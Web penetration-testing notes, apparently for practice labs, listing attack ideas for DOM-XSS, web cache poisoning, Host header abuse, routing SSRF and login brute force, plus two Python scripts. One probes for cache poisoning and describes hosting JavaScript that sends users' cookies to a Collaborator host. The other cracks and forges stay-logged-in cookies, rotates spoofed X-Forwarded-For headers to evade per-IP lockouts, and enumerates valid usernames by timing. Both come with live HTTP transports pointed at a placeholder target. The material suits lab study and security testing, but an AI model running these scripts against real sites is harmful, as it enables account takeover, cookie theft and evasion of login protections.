Content Discovery
ffuf
git repo “/.git”
check source code
DOM-XSS
Identify
check source code for hand-written (non-library) JS and the sinks it writes to
DOM Invader
ng-app attribute present? (AngularJS -> client-side template injection)
postMessage / web message handlers?
exploit: use DOM Invader
XSS
Any user input reflected into the DOM?
Web Cache Poisoning
unkeyed header
X-Forwarded-Host reflected into script src
host the payload there; have it send the user's cookie to Collaborator
unkeyed query param: utm_content
value reflected into the DOM -> XSS
second Host header
add a second Host header; its value is reflected in script src
cached redirect
X-Forwarded-Scheme: http makes the app redirect to https://<X-Forwarded-Host>/..., and that 302 gets cached
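Added example for the unkeyed header / unkeyed query param checks above (not part of the original notes): two requests under one fresh cache buster, the first injecting a canary through the candidate header or parameter, the second repeating the same URL without it. If the canary is still in the second body, the cache handed the poisoned copy to a client that never sent it. Transport is injected as `send(method, path, headers)`: `urllib_sender()` is a real one for a target you are allowed to test, `FakeFrontEnd` is a constructed origin plus cache so the script runs offline. The `cb` buster parameter, the `.oastify.example` canary host and the fake's reflection behaviour are assumptions, not anything observed on a real target.

```python
"""Added example, not part of the original notes: probe whether a header or a
query parameter is unkeyed by the cache but reflected by the origin.
Transport is injected as send(method, path, headers) -> (status, headers, body):
urllib_sender() is a real one, FakeFrontEnd is a constructed origin+cache so the
script runs offline. The "cb" buster parameter and the .oastify.example canary
host (a Collaborator host in practice) are assumptions."""
import re
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional, Tuple

Response = Tuple[int, Dict[str, str], str]
Sender = Callable[[str, str, Dict[str, str]], Response]


def urllib_sender(base_url: str) -> Sender:
    """Real transport: returns status, lower-cased headers and body text."""
    def send(method: str, path: str, headers: Dict[str, str]) -> Response:
        req = urllib.request.Request(base_url + path, method=method, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=10) as r:
                return r.status, {k.lower(): v for k, v in r.headers.items()}, r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, {k.lower(): v for k, v in e.headers.items()}, e.read().decode("utf-8", "replace")
    return send


def _with_query(path: str, params: Dict[str, str]) -> str:
    return path + ("&" if "?" in path else "?") + urllib.parse.urlencode(params)


def probe_unkeyed(send: Sender, path: str, header: Optional[str] = None,
                  param: Optional[str] = None) -> Dict[str, object]:
    """Request 1 injects a canary through the candidate header/param under a fresh
    cache buster; request 2 repeats the same URL WITHOUT it. If the canary is still
    in the body, the cache served the poisoned copy to a request that never sent it."""
    canary = "c" + secrets.token_hex(6) + ".oastify.example"  # assumed placeholder for a Collaborator host
    buster = {"cb": secrets.token_hex(4)}  # assumed keyed param: isolates our own cache entry
    first_params = dict(buster, **({param: canary} if param else {}))
    _, _, body1 = send("GET", _with_query(path, first_params), {header: canary} if header else {})
    _, hdrs2, body2 = send("GET", _with_query(path, buster), {})
    return {
        "reflected": canary in body1,
        "poison_cached": canary in body2,
        "in_script_src": bool(re.search(r"<script[^>]+src=[\"'][^\"']*" + re.escape(canary), body2)),
        "x-cache": hdrs2.get("x-cache"),
    }


class FakeFrontEnd:
    """Constructed offline stand-in for origin + cache (assumed behaviour). The origin
    reflects X-Forwarded-Host into a <script src> and utm_content into inline JS; the
    cache keys on method + path with utm_* params stripped and ignores request headers,
    so both X-Forwarded-Host and utm_content are unkeyed."""

    def __init__(self) -> None:
        self.store: Dict[Tuple[str, str], Response] = {}

    @staticmethod
    def _key(method: str, path: str) -> Tuple[str, str]:
        base, _, qs = path.partition("?")
        kept = [(k, v) for k, v in urllib.parse.parse_qsl(qs) if not k.startswith("utm_")]
        return method, base + "?" + urllib.parse.urlencode(kept)

    @staticmethod
    def _origin(path: str, headers: Dict[str, str]) -> Response:
        lower = {k.lower(): v for k, v in headers.items()}
        host = lower.get("x-forwarded-host", "www.target.example")
        utm = dict(urllib.parse.parse_qsl(path.partition("?")[2])).get("utm_content", "")
        body = (f'<script src="https://{host}/static/tracking.js"></script>'
                f'<script>var utm="{utm}";</script>')
        return 200, {"content-type": "text/html"}, body

    def __call__(self, method: str, path: str, headers: Dict[str, str]) -> Response:
        key = self._key(method, path)
        if key in self.store:  # cache hit: request headers never consulted
            s, h, b = self.store[key]
            return s, {**h, "x-cache": "hit"}, b
        resp = self._origin(path, headers)
        self.store[key] = resp
        return resp[0], {**resp[1], "x-cache": "miss"}, resp[2]


if __name__ == "__main__":
    fe = FakeFrontEnd()
    print("X-Forwarded-Host:", probe_unkeyed(fe, "/", header="X-Forwarded-Host"))
    print("utm_content:", probe_unkeyed(fe, "/", param="utm_content"))
    # real target: probe_unkeyed(urllib_sender("https://TARGET.net"), "/", header="X-Forwarded-Host")
```

`in_script_src` is the case from the notes (payload host lands in a script src, so a hosted JS file that exfiltrates `document.cookie` to Collaborator fires for every user who gets the cached copy); a hit on `poison_cached` with `in_script_src` false still means the value is cached and reflected, so check where in the DOM it lands.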
Host Headers
override the Host seen by the back-end / bypass Host validation with X-Forwarded-Host, X-Host, X-Forwarded-Server (for brute-force lockout bypass see X-Forwarded-For below)
Invalid hostname error? Try Host: xxx.oastify.com?TARGET.net
connection-state attack: send a request with the valid Host, then one with Host: localhost on the same keep-alive connection (front-end only validates the first request)
Routing-based SSRF
replace Host with an internal IP: 192.168.0.x, iterate the last octet
HTTP Request Smuggling
Brute force
stay-logged-in cookie contains username + password (hash)? decode it, forge candidate cookies and brute force them against the service
brute-force protected login
30-minute ban after repeated failures from one source IP
bypass by setting a fresh X-Forwarded-For on every request
Timing: submit a very long invalid password; a valid user is slower (the password gets checked), an unknown user is rejected fast
1. BF username by response time
2. BF password for the user found
Subtle invalid login
username brute force -> any difference in the responses (status, length, typo, trailing space)? the one that stands out is a valid user
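Added example covering the brute-force checks above (not part of the original notes): offline cracking of a stay-logged-in cookie, a fresh X-Forwarded-For per request to dodge the per-IP ban, the long-password timing enumeration, and the "odd one out" check for a subtly different invalid-login response. Transport is injected as `send(username, password, headers)` returning status, body and elapsed seconds: `urllib_login()` is a real one, `FakeLogin` is a constructed endpoint with synthetic timings and an invented account so everything runs offline. The cookie format base64("user:md5(password)"), the form field names and the 10.x.x.7 spoofed addresses are assumptions to adapt per target.

```python
"""Added example, not part of the original notes: helpers for the brute-force
checks above. Transport is injected as send(username, password, headers) ->
(status, body, elapsed_seconds); urllib_login() is a real one, FakeLogin is a
constructed login endpoint (synthetic timings, invented account) so the script
runs offline. The cookie format base64("user:md5(password)"), the field names
and the 10.x.x.7 spoofed addresses are assumptions to adapt per target."""
import base64
import hashlib
import itertools
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Dict, Iterable, List, Optional, Tuple

LoginResult = Tuple[int, str, float]
LoginSender = Callable[[str, str, Dict[str, str]], LoginResult]
_XFF = itertools.product(range(1, 255), repeat=2)  # 64k distinct spoofed addresses


def forge_stay_logged_in(username: str, password: str) -> str:
    """Candidate cookie in the assumed format, to replay against the service."""
    return base64.b64encode(f"{username}:{hashlib.md5(password.encode()).hexdigest()}".encode()).decode()


def crack_stay_logged_in(cookie: str, wordlist: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Offline: decode the cookie you hold, hash the wordlist against the md5 part."""
    user, _, digest = base64.b64decode(cookie).decode("utf-8", "replace").partition(":")
    if len(digest) != 32:  # not the assumed user:md5 layout
        return None
    for pw in wordlist:
        if hashlib.md5(pw.encode()).hexdigest() == digest:
            return user, pw
    return None


def next_xff() -> Dict[str, str]:
    """Fresh X-Forwarded-For per request so a per-IP lockout never sees two attempts from one address."""
    a, b = next(_XFF)
    return {"X-Forwarded-For": f"10.{a}.{b}.7"}


def urllib_login(url: str, user_field: str = "username", pw_field: str = "password") -> LoginSender:
    """Real transport: POST a form login and measure wall-clock time."""
    def send(username: str, password: str, headers: Dict[str, str]) -> LoginResult:
        data = urllib.parse.urlencode({user_field: username, pw_field: password}).encode()
        req = urllib.request.Request(url, data=data, headers=headers, method="POST")
        t0 = time.perf_counter()
        try:
            with urllib.request.urlopen(req, timeout=15) as r:
                status, body = r.status, r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            status, body = e.code, e.read().decode("utf-8", "replace")
        return status, body, time.perf_counter() - t0
    return send


def timing_enumerate(send: LoginSender, usernames: List[str], samples: int = 3,
                     pw_len: int = 1000, ratio: float = 2.0) -> List[str]:
    """Step 1: very long wrong password. A valid user pays for the password check,
    an unknown user is rejected early. Report users slower than ratio x the overall median."""
    long_pw = "A" * pw_len
    medians = {u: statistics.median(send(u, long_pw, next_xff())[2] for _ in range(samples))
               for u in usernames}
    baseline = statistics.median(medians.values())
    return [u for u, m in medians.items() if m > ratio * baseline]


def odd_one_out(send: LoginSender, usernames: List[str], password: str = "wrong-pw") -> List[str]:
    """Subtle invalid login: group responses by (status, exact body) and return the
    users whose response differs from the majority (typo, trailing space, length)."""
    shapes = {u: send(u, password, next_xff())[:2] for u in usernames}
    common = Counter(shapes.values()).most_common(1)[0][0]
    return [u for u, s in shapes.items() if s != common]


class FakeLogin:
    """Constructed stand-in: one account, ban after 3 failures per X-Forwarded-For,
    timing cost growing with password length only for the valid user, and a trailing
    space in the valid user's error message. Timings are synthetic, not measured."""

    def __init__(self, user: str = "alice", password: str = "hunter2") -> None:
        self.user, self.password, self.failures = user, password, Counter()

    def __call__(self, username: str, password: str, headers: Dict[str, str]) -> LoginResult:
        ip = headers.get("X-Forwarded-For", "203.0.113.9")
        if self.failures[ip] >= 3:
            return 403, "Too many incorrect login attempts. Try again in 30 minute(s).", 0.01
        elapsed = 0.02
        if username == self.user:
            elapsed += 0.00005 * len(password)  # synthetic hash cost, grows with input
            if password == self.password:
                return 302, "", elapsed
            body = "Invalid username or password "  # trailing space = the subtle tell
        else:
            body = "Invalid username or password."
        self.failures[ip] += 1
        return 200, body, elapsed
```

Against a real target, swap `FakeLogin()` for `urllib_login("https://TARGET.net/login")`, e.g. `timing_enumerate(urllib_login(...), wordlist_users)` then `odd_one_out(...)` on the same list; raise `samples` when the network is noisy, since a single slow round trip on an invalid user will otherwise look like a hit. The cookie crack needs no network at all: `crack_stay_logged_in(cookie_from_browser, wordlist)`.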
Authentication
registration restricted to a company email address